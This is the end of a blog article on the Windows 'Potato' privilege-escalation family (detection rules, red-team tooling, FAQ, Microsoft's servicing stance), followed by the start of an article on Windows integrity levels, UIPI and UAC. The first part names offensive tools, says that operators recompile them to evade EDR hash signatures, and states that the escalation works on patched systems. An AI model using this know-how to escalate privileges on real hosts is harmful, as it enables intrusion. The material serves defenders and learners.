If you defend Windows rather than attack it, the detection target is the conjunction of (a) named-pipe creation by an IIS or SQL or service account, (b) a SYSTEM-context process connecting to that pipe shortly after, and (c) `CreateProcessWithToken` from the original service-account process. None of the three events alone is anomalous. The conjunction is. Sysmon Event ID 1 (Process Create) paired with Event IDs 17 and 18 (PipeEvent: Pipe Created and Pipe Connected) plus ETW providers `Microsoft-Windows-COM` and `Microsoft-Windows-RPC` cover the activation-plus-pipe half [@ms-sysmon]; Sysmon Event ID 10 (ProcessAccess) on `lsass.exe` from the originating service account is the third pillar that surfaces the impersonation handle acquisition [@ms-sysmon]. Per-variant signatures are published as Sigma rules for the public LocalPotato, CoercedPotato, JuicyPotato, RottenPotato, and EfsPotato binaries [@sigma-potato-hktl; @sigma-localpotato], and Elastic's `privilege_escalation_via_rogue_named_pipe` rule fires on the PrintSpoofer / EfsPotato pipe-path pattern that GodPotato shares [@elastic-rogue-pipe]. A class-generalising rule that fires on the *primitive* (rather than per-binary) has not been published.

Library and framework support follows the same shape as any post-exploitation primitive (the picture here is community-empirical, drawn from public BOF and module repositories rather than vendor reference architectures). Cobalt Strike Beacon Object Files wrapping GodPotato, PrintSpoofer, and SweetPotato are widely shared in the red-team community -- incursi0n/GodPotatoBOF is one publicly published example that integrates with BeaconUseToken() for in-Beacon SYSTEM-token application [@godpotato-bof] -- and the same wrappers load into Sliver. PowerShell wrappers around PrintSpoofer and JuicyPotato are integrated into Empire and Starkiller. The Metasploit incognito post-exploitation module handles token impersonation as a primitive but does not wrap GodPotato directly [@msf-incognito]. The impacket toolkit's ntlmrelayx is the canonical relay engine for the tail of SilverPotato [@fortra-impacket], and OleViewDotNet -- Forshaw's tool -- is the discovery oracle that surfaced the sppui and ShellWindows AppIDs in the first place [@tyranid-oleview; @decoder-silverpotato; @decoder-fakepotato].

12. Frequently Asked Questions

The name `Potato` originates with Stephen Breen's `foxglovesec/Potato` repository, created February 9, 2016, three weeks after the January 16, 2016 HotPotato blog post [@foxglove-potato-repo; @foxglove-hotpotato]. HotPotato is in the family because it pivots through the same `SeImpersonatePrivilege` plus named-pipe-impersonation primitive that every later variant exploits -- the vehicle is different (NetBIOS spoofing + WPAD + HTTP-to-SMB rather than Distributed COM) but the architectural carve-out is the same. See §4 for the bracketing-variant framing. Because every Internet Information Services application-pool identity is granted the privilege by Windows default [@itm4n-printspoofer]. The grant exists for legitimate request-scoped impersonation -- it is the mechanism IIS uses to "act as" a calling user during authenticated request handling. The same default grant is the entire vulnerability surface for the Potato family. The Microsoft Security Servicing Criteria document treats the resulting `SeImpersonate`-to-SYSTEM transition as a safety boundary rather than a security boundary [@msrc-servicing-criteria; @troopers24]. No. CVE-2021-26414 hardening raises the *authentication* bar for Distributed COM clients to `RPC_C_AUTHN_LEVEL_PKT_INTEGRITY` and was fully enforced on March 14, 2023 in Phase 3 of the rollout [@ms-kb5004442]. It does not declare Distributed COM activation a security boundary. The proof is that GodPotato, which exploits an RPCSS OXID-handling defect rather than the activation authentication level, survives all three phases of the rollout and remains the practitioner default in 2026 [@beichendream-god]. Open question, with a defensible reading. LocalPotato attacks the local-user-to-local-user NTLM authentication context handle, which *is* on the servicing-criteria boundary list [@decoder-localpotato; @msrc-servicing-criteria]. RemotePotato0 attacks the `SeImpersonate`-to-SYSTEM transition via cross-session Distributed COM activation, which is *not* on the list and was therefore deemed an extension of the existing carve-out [@sentinellabs-relaying; @troopers24]. The two boundaries (local NTLM authentication context vs cross-session Distributed COM activation) are not equivalent in Microsoft's published servicing position. Yes, on every patched Windows 11 / Server 2025 build as of this writing [@beichendream-god]. The RPCSS OXID-handling defect that GodPotato weaponises survives all three CVE-2021-26414 hardening phases [@ms-kb5004442; @compass-three-headed]. Microsoft has not assigned a CVE to the underlying defect, consistent with the servicing-criteria reading. Operationally, the only thing that changes between releases is the binary signature -- EDR vendors signature the public Apache-2.0 binary by hash, and operators recompile from source with cosmetic changes to evade [@beichendream-god]. Does not exist as of May 2026. If a 2025-2026 variant appears under an unfamiliar name -- French or otherwise -- verify against the canonical sources before citing: `decoder.cloud` for the Pierini and Cocomazzi line, `github.com/antonioCoco/*` for the Cocomazzi-authored repositories, `github.com/BeichenDream/*` for the BeichenDream line, and `itm4n.github.io` for the PrintSpoofer / SweetPotato line [@decoder-silverpotato; @antonio-rogue; @beichendream-god; @itm4n-printspoofer]. The Troopers 24 retrospective is the community-canonical lineage list as of the most recent consolidated talk [@troopers24]. Informally, no. The primitive `ImpersonateNamedPipeClient` is in the legitimate hot path of nearly every Windows service [@ms-impersonate-api]. Per-variant signatures exist for the public binaries (GodPotato, PrintSpoofer, JuicyPotato), and ETW providers `Microsoft-Windows-COM` and `Microsoft-Windows-RPC` surface the activation-and-RPC events that the Distributed COM variants generate. A class-generalising detection rule has not been published as of May 2026, and the false-positive rate on legitimate Windows services is high for any rule that fires on `ImpersonateNamedPipeClient` alone [@troopers24].

13. The Architectural Decision

Return to the opening scene. The same Internet Information Services web shell, the same GodPotato.exe, the same ten-second SYSTEM shell. The reader now knows this is not a zero-day. It has been a single-binary operation for the better part of a decade. Every step is documented Win32 behaviour. And every step is permitted by Microsoft's published servicing position [@beichendream-god; @msrc-servicing-criteria; @troopers24].

Nine years of named-variant disclosures. Eleven named variants. Three Microsoft hardening waves. Two CVEs -- LocalPotato in January 2023, FakePotato in July 2024 [@nvd-cve-2023-21746; @nvd-cve-2024-38100]. One "Won't Fix" decision on a working Domain Admin escalation in April 2021 [@sentinellabs-relaying]. Zero declarations of SeImpersonatePrivilege or Distributed COM activation as a security boundary [@troopers24; @msrc-servicing-criteria]. The MSRC Windows Security Servicing Criteria document, the one whose boundary definition fetches in static HTML and whose enumeration table is JavaScript-rendered, is the through-line [@msrc-servicing-criteria]. Pierini and Cocomazzi say it bluntly in the Troopers 24 abstract:

Microsoft does not consider WSH a security boundary but rather a safety boundary; for this reason, many Potato exploits work (and have been working) on fully updated Windows systems. -- Pierini and Cocomazzi, Troopers 24 abstract [@troopers24]

Microsoft will never fix the Potato class because fixing it requires declaring Distributed COM activation a security boundary, and they have spent twenty-five years insisting it is not. What would change that? A major-version Windows release that explicitly revokes the default SeImpersonatePrivilege grant from service accounts -- a compatibility-breaking change that breaks IIS, SQL Server, BITS, the Spooler, and most third-party services that depend on the legitimate impersonation contract. No such release is on the public roadmap as of May 2026 [@msrc-servicing-criteria; @ms-kb5004442; @beichendream-god].

Until then, the family is alive, and the ten-second SYSTEM shell is the default outcome of any IIS or service-account foothold on a fully-patched Windows machine. That is not the unintended consequence of an unpatched bug. That is the intended consequence of a published architectural decision.

Key idea: The Potato family is not a stack of bugs Microsoft is slowly working through. It is the long-running consequence of a published architectural decision: that the SeImpersonatePrivilege-to-SYSTEM transition is a safety boundary, not a security boundary. Eleven variants over nine years of named-variant disclosures (HotPotato January 2016 -> FakePotato August 2024) are the empirical proof of how stable that decision is [@troopers24; @msrc-servicing-criteria].

The following retention block summarises the six key terms above. Citations for each definition live in §2.1, §2.2, §6.5, §6.1, §3, and §2 of the body respectively (the StudyGuide MDX wrapper does not render @ref-id links inline).

The Integrity-Level Stack: MIC, UIPI, and Twenty Years of UAC's Quiet Plumbing

noreply@paragmali.com (Parag Mali) — Sun, 31 May 2026 00:00:00 GMT

**UAC has never been the consent prompt.** Two Vista-era primitives, Mandatory Integrity Control (MIC) and User Interface Privilege Isolation (UIPI), add an integrity axis to the access check and a windowing-layer analog that blocks cross-IL message injection. The split-token model gives every administrator a Medium-IL filtered token at logon and holds the full admin token dormant. The yellow dialog is the smallest part of the system. The author of its canonical reference, Mark Russinovich, publicly disclaimed it as "not a security boundary" in February 2007, and twenty years of bypass research has been the empirical confirmation. In November 2024, Microsoft finally moved the boundary line with Administrator Protection. The MIC + UIPI plumbing outlived UAC itself: it is still the substrate of every browser sandbox, every AppContainer, and the Adminless successor in 2026.

1. Two whoami Outputs, Sixty Seconds Apart

Open an unelevated PowerShell on a Windows 11 administrator account. Run whoami /groups /priv. Click "Yes" on the yellow prompt. Open an elevated PowerShell on the same account. Run the same command. The two outputs are different lists of SIDs. Sixty seconds have passed. The consent prompt did not move a single bit of OS state on its own. The operating system did, because of a stack of primitives that ship with every Windows install and that almost no Windows user has ever heard the names of. This article is a tour of that stack, and of what twenty years of bypass research has taught us about it.

Place the two outputs side by side. The user is the same. The session is the same. The clock has barely moved. Read them carefully.

PS C:\Users\admin> whoami /groups /priv | findstr /i "Mandatory Administrators SeDebug"
BUILTIN\Administrators                Group used for deny only
Mandatory Label\Medium Mandatory Level Label
(SeDebugPrivilege not present)

PS C:\Users\admin> whoami /groups /priv | findstr /i "Mandatory Administrators SeDebug"
BUILTIN\Administrators                Enabled by default, Enabled group, Group owner
Mandatory Label\High Mandatory Level   Label
SeDebugPrivilege                       Disabled

Four facts fall out of those two outputs, and each one of them is a foothold for the rest of this article.

The first fact is that the administrator group SID is present in both tokens. It is not added by the elevation. In the filtered token it carries the flag SE_GROUP_USE_FOR_DENY_ONLY, which means the access-check algorithm consults it only when matching a deny ACE and otherwise pretends it is absent [@uac-how-it-works]. In the elevated token, the same SID is fully enabled. The dialog did not add a SID; it changed which token Windows uses.

The second fact is the integrity level. In the filtered token, the mandatory label reads Mandatory Label\Medium Mandatory Level. In the elevated token, the same label reads Mandatory Label\High Mandatory Level. That label corresponds to a well-known SID under the S-1-16-X family (S-1-16-8192 for Medium and S-1-16-12288 for High) [@well-known-sids]. The integrity level is not a regular group SID. It is a separate field on the token, and as we will see in §4, it drives a separate access-check evaluator that runs before the discretionary access check [@mic-doc].

The third fact is the privilege set. The filtered token holds a small set of user-mode privileges (SeChangeNotifyPrivilege, SeShutdownPrivilege, a handful of others). The elevated token holds the full administrator privilege set, including the named ones the security press writes about: SeDebugPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeBackupPrivilege, SeAssignPrimaryTokenPrivilege, and twenty or so others, depending on the Windows build [@russinovich-tnm-2007].

The fourth fact is the most subtle, and the one this whole article exists to make rigorous. The yellow dialog did not create the elevated token. The OS created it at logon, almost half an hour before the prompt ever rendered, and held it dormant in the LSA. The prompt asked the user a single question: may I, the operating system, use the token I already have? It did not ask: may I, the operating system, mint a more privileged token now? That distinction is the difference between how every Windows user talks about UAC and how UAC actually works.

Note: The yellow dialog moves no bits. It asks permission to use authority that was already constructed at logon and held dormant. The integrity primitives, MIC and UIPI, do the bounding work whether or not a prompt ever renders.

The four primitives we are about to tour are the substrate beneath everything in those two whoami outputs. Mandatory Integrity Control (MIC) is the access-check evaluator that decided your Medium-IL PowerShell could not write into %SystemRoot%\System32 before any DACL was consulted. User Interface Privilege Isolation (UIPI) is the windowing-layer analog that prevented your Medium-IL Edge tab from injecting WM_SETTEXT into the High-IL elevated PowerShell next to it. The split-token model is the LSA policy that decided your interactive shell should hold the Medium-IL token instead of the High-IL one. The Application Information service (Appinfo) is the SYSTEM-trusted broker that mediated the token swap when you clicked "Yes."

This article walks every one of those layers, then ends at the empirical proof: twenty years of "UAC bypasses," and Microsoft's own quiet acknowledgement, from week one, that the dialog was never the security boundary [@russinovich-blog-2007]. Why did Microsoft build this stack in the first place? What was wrong with how Windows XP did it?

2. The XP Problem and the Vista Bet

On the overwhelming majority of consumer Windows XP installs in 2003, every process the user launched ran as Administrator, because the first interactive account XP provisioned at setup was an Administrator and the typical user never created a separate Limited User account [@margosis-archive]. Every browser tab. Every embedded Word macro. Every drive-by download. The operational vulnerability surface was the entire OS, because authority on Windows is carried in the access token, and the access token of those XP-era user processes held the full administrator SID set.

Sysinternals co-founder Mark Russinovich, then a Microsoft engineer following the 2006 Winternals acquisition, framed the problem precisely in the June 2007 issue of TechNet Magazine: "Most users of Windows XP run with full administrative rights all the time, allowing all software they run, including malware, to have unrestricted access to the system" [@russinovich-tnm-2007]. The sentence reads like a confession, and it was. The OS shipped with a sound access-control model and an operational policy that defeated it from the first reboot.

Two distinct threat models drove the architectural response Vista shipped four years later.

Threat model one: the runaway admin

The first threat model was the runaway admin. Default-admin consumer installs meant malware silently inherited admin authority because the user was the admin. A drive-by exploit in Internet Explorer ran as the user, the user was an admin, and the malware was an admin. There was no point in the OS where a least-privilege boundary could intervene, because the token never carried a least-privilege bound to begin with. The DACLs were correct; the policy that filled the tokens was the failure.

Threat model two: the shatter-attack class

The second threat model was the shatter-attack class. In August 2002, security researcher Chris Paget published a paper titled "Exploiting design flaws in the Win32 API for privilege escalation" on the Bugtraq mailing list, immediately mirrored on Help Net Security [@helpnet-paget]. The paper coined the term shatter attack and demonstrated that on Windows NT, 2000, and XP, any process running on a user's interactive desktop could send a WM_TIMER message carrying a callback function pointer to any other process's message loop on the same desktop. The receiving process would invoke the callback in its own address space, at its own privilege level [@shatter-wiki].

The shatter-attack term is sometimes attributed to Brett Moore alone. Paget's August 2002 Bugtraq paper actually coined the term; Moore's Black Hat USA 2004 talk Shoot The Messenger: Win32 Shatter Attacks productised the technique class and brought it to a wider conference audience. Both attributions are correct for different artifacts.

This was an architectural defect. The receiving process did not authenticate the message origin. It could not, because the Win32 messaging system was designed in the late 1980s under the assumption that all windows on a desktop belonged to one trust principal. By 2002, that assumption had been false for a decade: services ran on the user's interactive desktop with LocalSystem authority, and the user's browser could send them messages.

Microsoft's December 2002 patch (security bulletin MS02-071) fixed individual services that exposed the most exploitable callbacks. It did not fix the architectural class, because the class was a property of the Win32 messaging design, not of any one service [@shatter-wiki].

The popular history of the shatter-attack class collapses two separate authorship events into one. Chris Paget's August 2002 Bugtraq paper coined the term and produced the original demonstration tool (which Paget called "Shatter") [@helpnet-paget]. Brett Moore's Black Hat USA 2004 talk *Shoot The Messenger: Win32 Shatter Attacks*, eighteen months later, productised the technique into a conference-grade reference talk and contributed additional disclosure work at Security-Assessment.com.

Both attributions are accurate for different artifacts: Paget for the term and the August 2002 paper, Moore for the Black Hat 2004 productisation. The Wikipedia Shatter attack article preserves both authorships verbatim [@shatter-wiki]. The reason the disambiguation matters: any historical account of Vista's UIPI design decision must attribute the threat-model framing correctly, because Microsoft cited Paget's 2002 paper, not Moore's 2004 talk, in the internal architectural discussions Russinovich later summarised [@russinovich-blog-2007].

The Vista bet, stated as four design decisions

Between 2005 and 2006, Microsoft made four decisions about how Vista would respond. The first was to split the administrator's authority by default: an admin user would not hold a single admin token at logon, but a filtered token plus a dormant linked one. The second was to mediate the recombination through an OS-controlled UI surface, so the user could see and consent to the moment authority crossed an integrity boundary. The third was to add a second access-check axis (integrity) that the DACL could not override. The fourth was to add a windowing-layer analog to close the cross-IL variant of the shatter-attack class.

All four shipped together. Vista RTM'd on November 8, 2006 to OEMs and businesses, and Microsoft launched it to consumers on January 30, 2007 [@vista-press-release]. The press release called it "the most significant product launch in Microsoft Corp.'s history."

The architectural canon was published five months later, in the June 2007 issue of TechNet Magazine under the title Security: Inside Windows Vista User Account Control [@russinovich-tnm-2007]. The author was Russinovich, and the article became the single most-cited primary on UAC in the Windows-security literature. Five months earlier, however, in a TechNet Blogs post about PsExec, the same author had quietly written something the entire later debate would rest on, and almost no one read it for what it actually said [@russinovich-blog-2007]. We will return to that post in §7. First, the harder question: why couldn't NT's existing access-control model handle any of this on its own?

3. Why the DACL and the Privilege Were Not Enough

Windows NT had the access-control model from day one. It had Security Identifiers (SIDs), access tokens, discretionary access control lists (DACLs), privileges, and an access-check algorithm with a name (SeAccessCheck) that the kernel exposed and documented [@access-control][@windows-internals]. The model was correct in theory and broken in practice. To see why, watch what happens when an XP administrator opens a malicious Word document.

The user double-clicks the document. Word starts. Word loads the document's embedded macro. The macro calls URLDownloadToFile and writes evil.exe into %TEMP%. Then it calls CreateProcess on evil.exe. The new process inherits its parent's primary access token, which is the user's interactive token, which carries the administrator group SID, enabled, with the full administrator privilege set. The DACL on HKLM\SYSTEM\CurrentControlSet\Services grants Full Control to BUILTIN\Administrators. The malware writes a new service entry. The malware now persists across reboots, all without a single elevation prompt, because there was no elevation transition to prompt at. The user was already the administrator [@russinovich-tnm-2007].

The first problem is in the D of DACL. Discretionary access control lists are discretionary by definition: the owning principal of an object decides who has access [@dacls-control]. An attacker running as the user can rewrite any DACL the user owns. That is not a bug; it is the meaning of the word discretionary. Mandatory access-control models (Bell-LaPadula 1973 [@blp-wiki], Biba 1977 [@biba-wiki]) exist precisely because discretionary models cannot defend against principals running with the owner's authority.

The second problem is in the privilege model. A Windows access token carries a list of named privileges such as SeDebugPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege. Each privilege is a per-token authorisation to bypass some specific DACL check. An admin token holds them all. There is no way in the NT 4.0 / 2000 / XP design to say "this Word process holds the admin's identity but should not be trusted to use SeDebugPrivilege." Privileges are granted to tokens at logon, and the only way to remove them from a downstream process is to construct a restricted token explicitly, by hand, with CreateRestrictedToken [@createrestrictedtoken].

Generation 1: the seven-year failure to make least-privilege voluntary

Between 1999 and 2006, Microsoft and the Windows security community tried five different ways to make least privilege voluntary. None of them worked at consumer scale.

CreateRestrictedToken is a Win32 API, documented since Windows XP and Server 2003, that produces a copy of an existing access token with selected SIDs marked deny-only, selected privileges removed, and an optional list of restricting SIDs added [@createrestrictedtoken]. It is the kernel primitive every later sandbox (Chromium's renderer sandbox, AppContainer, Office Protected View) is built on. It was a primitive, not a policy. A consumer install with default-admin logons could not use it without an opt-in from every application vendor.

runas.exe, shipped in Windows 2000, let a user explicitly launch a process under a different identity. The user was supposed to log in as a standard user and runas an administrator account when needed. In practice, the user logged in as the administrator and forgot the standard account existed.

Software Restriction Policies (SRP), shipped with Windows XP, let a domain admin define hash, path, certificate, or zone rules that the OS enforced at process creation [@srp-2003]. SRP was a policy mechanism on top of the SAFER substrate [@winsafer]. It worked when configured. On consumer Windows it was off by default; on enterprise Windows it was configured by the few who knew it existed.

Aaron Margosis, then a Microsoft consultant, ran a years-long blog campaign called "Non-Admin" arguing that ordinary users should log in as standard users and only elevate when necessary. His tooling included LUA Buglight (which diagnosed which OS calls a misbehaving application made that required admin privilege), MakeMeAdmin (a runas shim), and PrivBar (a status-bar widget that displayed the IL of the current process) [@margosis-archive]. The blog became required reading inside Microsoft and the Windows-admin community.

Margosis's writing documents the daily friction of being a non-admin on XP. A printer-driver installer fails because it writes a per-user setting to `HKLM`. A game launcher fails because it writes save files to `%ProgramFiles%`. A 1998 line-of-business app fails because it stores its INI file under its install directory. Each failure was the application's fault; in aggregate, the application population rendered non-admin operation untenable for the typical user [@margosis-archive].

Margosis's own pattern, openly discussed on the blog, was to give up on per-application diagnosis and log in as Administrator full-time, while documenting the friction professionally so Microsoft could harvest the data for Vista's compatibility shims. The primitives existed (CreateRestrictedToken, SRP, the SAFER substrate). The third-party software base rendered them unusable. That dataset is the reason Vista shipped file and registry virtualisation as a built-in shim [@russinovich-tnm-2007]: the only alternative was for every application vendor to fix their software, and Margosis's blog had documented for half a decade that this was not happening.

The lesson Microsoft took from the 1999-2006 experience was that voluntary least privilege does not scale. You cannot solve the runaway-admin problem with policy and exhortation. You need an architectural primitive that runs by default, bounds authority by integrity rather than by identity, and absorbs the legacy of applications written for unrestricted admin without breaking them. All four primitives of the Vista bet shipped together in November 2006 [@vista-press-release].

What does an integrity primitive look like, and how is it different from "another ACE"?

4. The Twin Primitives: MIC and UIPI

4.1 Mandatory Integrity Control

An access-check evaluator that compares the integrity level of a subject token to the integrity level of a target object before consulting the object's DACL. MIC denials short-circuit the access check; a Low-IL principal cannot write to a Medium-IL object regardless of what the DACL says.

The load-bearing fact about MIC is in a single sentence on the Microsoft Learn reference page, and the entire architectural difference between MIC and "just another ACE" lives in that sentence. MIC "evaluates access before access checks against an object's discretionary access control list (DACL) are evaluated" [@mic-doc].

Pause on that ordering. Before the DACL. Not together with it. Not after it. The integrity-level check is a separate evaluator that runs first, and its denial is final. If the IL check denies access, the DACL is never consulted, no matter what the DACL says. That is what the word mandatory in Mandatory Integrity Control means.

A well-known SID, carried on every Windows access token and every securable object, that orders subjects and objects on a seven-level integrity lattice (Untrusted, Low, Medium, Medium Plus, High, System, Protected Process).

The seven well-known integrity-level SIDs are defined in the Well-known SIDs reference page on Microsoft Learn [@well-known-sids].

Integrity level	RID (S-1-16-X)	Typical use
Untrusted	`S-1-16-0`	Most-restricted sandboxes; rare on consumer Windows
Low	`S-1-16-4096`	IE Protected Mode, AppContainer, Edge / Chrome renderers
Medium	`S-1-16-8192`	Default for interactive user processes
Medium Plus	`S-1-16-8448`	UI-Access processes (`uiAccess=true` manifest, Windows 7+)
High	`S-1-16-12288`	Elevated administrative processes
System	`S-1-16-16384`	Kernel-mode and `LocalSystem` services
Protected Process	`S-1-16-20480`	PPL-protected processes (LSASS with `RunAsPPL`, antimalware)

The Microsoft Learn MIC reference page describes the operational set as four integrity levels (low, medium, high, system) [@mic-doc]. The Well-known SIDs reference page enumerates seven [@well-known-sids]. Both framings are correct: Untrusted is rare on consumer systems, Medium Plus is a UI-Access-only quirk used by accessibility software, and Protected Process overlaps with Protected Process Light signing-level semantics rather than the canonical IL pipeline. The four-vs-seven discrepancy is a documentation artifact, not an inconsistency in the kernel.

The IL lives on a token in the TokenIntegrityLevel field, retrievable through GetTokenInformation and the TOKEN_MANDATORY_LABEL structure [@mic-doc]. The IL lives on an object in the system access control list (SACL) as a SYSTEM_MANDATORY_LABEL_ACE, a special ACE type that carries the object's IL SID and a mandatory-policy mask [@mandatory-label-ace]. Three policy bits are defined in the winnt.h header [@mandatory-label-ace].

SYSTEM_MANDATORY_LABEL_NO_WRITE_UP (0x1) -- default. A subject at lower IL cannot write to this object.
SYSTEM_MANDATORY_LABEL_NO_READ_UP (0x2) -- opt-in. A subject at lower IL cannot read this object.
SYSTEM_MANDATORY_LABEL_NO_EXECUTE_UP (0x4) -- opt-in. A subject at lower IL cannot execute this object.

Object authors who do not specify a mandatory label inherit the default, which is NO_WRITE_UP only [@mic-doc]. The opt-in policies are exactly that: opt-in. A High-IL process that wants its files invisible to a Medium-IL process must explicitly request NO_READ_UP on the SACL. By default, MIC bounds writes, not reads, and that is one of the structural shapes Forshaw's 2017 "Reading Your Way Around UAC" series exploited [@forshaw-reading-uac].

The "regardless of DACL" property is the part to read slowly. A Low-IL principal cannot write to a Medium-IL object "even if that object's DACL allows write access to the principal," because the IL check runs first and short-circuits the access decision before the DACL evaluator ever sees the request [@mic-doc]. This is the difference between adding "another ACE" for integrity and adding a separate evaluator that runs first. An integrity ACE in the DACL would have been overridable by the object owner, because DACLs are discretionary. A mandatory-label ACE in the SACL is enforced by SeAccessCheck itself, independently of any other ACE in the DACL.

flowchart TD A["Subject requests access
(SID set, IL, desired access)"] --> B["MIC evaluator
compares subject IL to object IL
against NO_WRITE_UP / NO_READ_UP policy"] B --> C{"IL check allows
requested access?"} C -- "No" --> D["ACCESS_DENIED
(DACL not consulted)"] C -- "Yes" --> E["DACL evaluator
walks ACEs in order
(deny first, then allow)"] E --> F{"DACL grants
requested access?"} F -- "Yes" --> G["ACCESS_GRANTED"] F -- "No" --> H["ACCESS_DENIED"]

The architectural payoff is in the pseudocode of the access-check decision itself. Strip the API noise away and the decision reduces to two evaluators in series. The conceptual ordering is exact.

{` // Pseudocode of the Windows access-check ordering (Vista+). // See Microsoft Learn: Mandatory Integrity Control.

function seAccessCheck(subjectToken, object, desiredAccess) { // Step 1: Mandatory Integrity Control. Runs before the DACL. const subjectIL = subjectToken.integrityLevel; // e.g. Medium = 0x2000 const objectIL = object.mandatoryLabel.integrityLevel; // e.g. High = 0x3000 const policy = object.mandatoryLabel.policy; // bitmask

if (subjectIL < objectIL) { if ((policy & NO_WRITE_UP) && (desiredAccess & WRITE_BITS)) return 'ACCESS_DENIED'; if ((policy & NO_READ_UP) && (desiredAccess & READ_BITS)) return 'ACCESS_DENIED'; if ((policy & NO_EXECUTE_UP) && (desiredAccess & EXECUTE_BITS)) return 'ACCESS_DENIED'; }

// Step 2: only if MIC allowed do we consult the DACL. for (const ace of object.dacl.aces) { if (ace.sid in subjectToken.sids) { if (ace.type === 'DENY' && (ace.mask & desiredAccess)) return 'ACCESS_DENIED'; if (ace.type === 'ALLOW') desiredAccess &= ~ace.mask; if (desiredAccess === 0) return 'ACCESS_GRANTED'; } } return 'ACCESS_DENIED'; // implicit deny if no ACE grants } `}

The naive reading of MIC is "they added another ACE for integrity." The correct reading is that they added a separate axis with its own evaluator that the DACL cannot override. The reader who internalises that ordering can re-derive almost every subsequent design decision Vista made about UAC, AppContainer, IE Protected Mode, and Administrator Protection. A MIC denial is final. The DACL is not consulted. That is what mandatory means.

Key idea: MIC adds a second axis to the access check. The first axis is identity (DACL plus token SIDs); the second is integrity (IL). The two axes are evaluated in order: integrity first, identity second. A failure on the integrity axis short-circuits the entire check, regardless of what the identity axis would have said.

MIC bounds file, registry, and most other securable-object writes across IL boundaries. But the XP-era shatter attacks Paget published in 2002 were not about file writes. They were about same-desktop cross-process message injection in the Win32 windowing layer, and MIC cannot help with that, because window messages do not pass through SeAccessCheck. So Vista shipped a second primitive specifically for the windowing layer.

4.2 User Interface Privilege Isolation

The windowing-layer analog of MIC. UIPI blocks a defined subset of window messages and hook APIs sent from a lower-IL process to a window owned by a higher-IL process on the same desktop, terminating the cross-IL variant of the shatter-attack class.

If MIC is mandatory integrity for objects, UIPI is mandatory integrity for windows. Same idea, different layer of the OS. Same principle: a separate evaluator that runs in the window manager and blocks cross-IL operations regardless of the window's own configuration [@uipi-wiki].

The canonical failed-shatter scenario is short and exact. A Medium-IL malware process calls SendMessage(hwnd, WM_SETTEXT, 0, (LPARAM)"some-attacker-controlled-string") against a window handle (hwnd) belonging to a High-IL elevated PowerShell on the same desktop. On Windows XP, which predates UIPI and had no integrity-based elevation, the analogous message would arrive at a higher-privileged process's window and update its edit control, with no authentication check anywhere in the path. On Vista and every subsequent Windows release, the call returns zero. GetLastError returns ERROR_ACCESS_DENIED. The message is silently dropped by win32k.sys before the receiving process's window procedure ever sees it. The window manager noticed that the sender's IL was lower than the receiver's IL and dropped the message [@uipi-wiki][@russinovich-blog-2007].

The "silently dropped" part matters operationally. Legacy applications written before Vista did not check the return value of SendMessage. When Vista shipped UIPI, those applications kept "working" in the sense that they did not crash. They just stopped being effective at any cross-IL interaction they may have previously relied on. This is the same compatibility shape Microsoft used everywhere in Vista: the new bound was real, but the API surface returned plausible failure codes rather than raising new errors that broke legacy callers.

What UIPI blocks, precisely

UIPI does not block every window message. It blocks a specific dangerous subset, and a complete reading of the article requires reading the list slowly.

Operation	UIPI behaviour from lower IL to higher IL
`SendMessage` / `PostMessage` for `WM_SETTEXT`, edit-control mutators, combo-box mutators	Blocked; returns 0 / `ERROR_ACCESS_DENIED`
Posted messages above `WM_USER` (0x0400)	Blocked
`WM_TIMER` with a callback function pointer	Blocked (the original Paget vector)
`SetWindowsHookEx` against a higher-IL thread or process	Blocked
`AttachThreadInput` to a higher-IL thread	Blocked
`SendInput` targeting a higher-IL window	Blocked
Journal record / journal playback hooks	Blocked
Mouse and most keyboard input from the OS itself	Allowed (the user is the principal)
Most paint messages (`WM_PAINT`, `WM_ERASEBKGND`)	Allowed
Read-only window queries (`GetWindowText`, `EnumWindows`)	Allowed (return empty / minimal data rather than failing)

"UIPI blocks all WM_* messages" is one of the most common misconceptions in Windows-security literature. It does not. It blocks the dangerous subset: the messages and hooks that allow a sender to alter the receiving process's state or execute code in it [@russinovich-blog-2007][@uipi-wiki].

sequenceDiagram participant M as Medium-IL malware participant W as win32k.sys participant P as High-IL PowerShell M->>W: SendMessage(hwnd, WM_SETTEXT, ...) W->>W: Compare sender IL (Medium) to target window IL (High) Note over W: Sender IL lower than target IL, WM_SETTEXT in dangerous subset W-->>M: Returns 0, ERROR_ACCESS_DENIED Note over P: Window procedure never invoked, text unchanged

The Microsoft Learn page that opens "Modifies the User Interface Privilege Isolation (UIPI) message filter for a specified window" is the ChangeWindowMessageFilterEx function reference [@changewindowfilter]. It is the closest thing to a first-party UIPI conceptual page on Microsoft Learn. There is no standalone Microsoft Learn page titled "User Interface Privilege Isolation" at the winmsg path: the Wikipedia UIPI article is the standard secondary anchor for the concept itself [@uipi-wiki], and Russinovich's February 2007 TechNet Blogs post introduces UIPI by name in the original architectural canon [@russinovich-blog-2007].

The opt-in exemption: `ChangeWindowMessageFilterEx`

The UIPI block is per-window and per-message. When a higher-IL window has a legitimate reason to accept a specific message from lower-IL senders (for example, a developer tool that needs to receive WM_COPYDATA from a Medium-IL client), the higher-IL process can call ChangeWindowMessageFilterEx to add the specific message to its window's allow-list [@changewindowfilter].

The action constants are documented as MSGFLT_ALLOW (add the message to the allow-list), MSGFLT_RESET (remove explicit policy and inherit defaults), and MSGFLT_DISALLOW (explicitly block the message even if defaults would allow it) [@changewindowfilter]. The function returns BOOL; failure is non-fatal and the caller is expected to validate the result.

A High-IL window that opts WM_SETTEXT into the cross-IL allowed list inherits the responsibility to validate the contents of every message it then receives. The filter is the gate. It is not the validator. A higher-IL process that takes attacker-controlled text and pastes it into a system shell has bypassed UIPI in the same way a service that takes attacker-controlled input and passes it to system() has bypassed least privilege. The mechanism cannot make the higher-IL process safe; it can only make the higher-IL process aware.

The `uiAccess=true` carve-out

The single largest residual exemption from UIPI is the uiAccess=true manifest flag, designed to support accessibility software (screen readers, on-screen keyboards, remote-control tools) that needs to interact with windows above its own IL [@uia-security]. A process that asserts uiAccess=true in its application manifest gets, at process creation, a token flag (TokenUIAccess) that exempts the process from UIPI's cross-IL blocks for the outbound direction. A Medium-IL UI-Access process can post WM_SETTEXT to a High-IL elevated PowerShell window, because the Medium-IL process is acting on behalf of an accessibility client.

